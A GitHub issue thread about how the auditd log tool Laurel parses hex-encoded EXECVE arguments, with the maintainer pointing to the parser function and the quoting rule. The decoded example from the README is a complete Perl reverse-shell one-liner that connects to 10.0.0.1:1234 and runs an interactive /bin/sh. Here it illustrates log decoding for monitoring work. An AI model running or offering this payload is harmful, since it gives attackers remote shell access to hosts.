Understanding hexadecimal argument handling in EXECVE

[ZarKyo]

Hello,

I am currently working with auditd, and as you mentioned here :

Files and program executions are logged via PATH and EXECVE elements. The character set for strings is a limited subset of ASCII no escaping mechanism exists: If a string contains bytes that have special meaning in the format (even space or quote characters), the entire string is hex-encoded.

I am looking for the specific part of the code that determines, for an EXECVE entry, whether a string in hexadecimal format (for an argument) originates directly from the command line or is a result of converting the command line to hexadecimal due to the constraints mentioned above. I’d like to understand the logic behind this mechanism. Could you briefly explain how it works?

For example, in the README.md, the a2 field is transformed into a human-readable string :

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

If for some reason a binary asks for a hexadecimal or decimal string as an argument (./binary 757365 or ./binary "757365"), it will give something like this if I'm not mistaken :

type=EXECVE msg=audit(1626611363.720:348502): argc=2 a0="binary" a1="757365"

Will Laurel try to convert the string "757365" from hex to ASCII and give the following result or leave the string as is ?

{ … "EXECVE":{ ​​"argc": 2,"ARGV": ["binary", "use"]}, …}

Do you detect the presence of the double quote after the equals sign of the a1 field ?

I’ve gone through the code to try and figure it out (specifically the coalesce.rs file), but I’m not an experienced developer, especially not in Rust, so I’m not sure if I’m looking in the right place. From what I understood, this might be related to the handle_syscall and/or transform_execve functions.

[hillu]

As of c4bc724, the parsing code has been split off into https://github.com/hillu/linux-audit-parser-rs. You'll find the code there in parser.rs, in the function parse_encoded. Your guess is correct: Hex-encoded strings aren't quoted, regular strings that don't need to be hex-encoded have double quotes around them.

(Unfortunately, there are exceptions to the rather straightforward encoding rule, but there's extra code for those exceptions.)

The handle_syscall, transform_execve functions work on the already parsed values.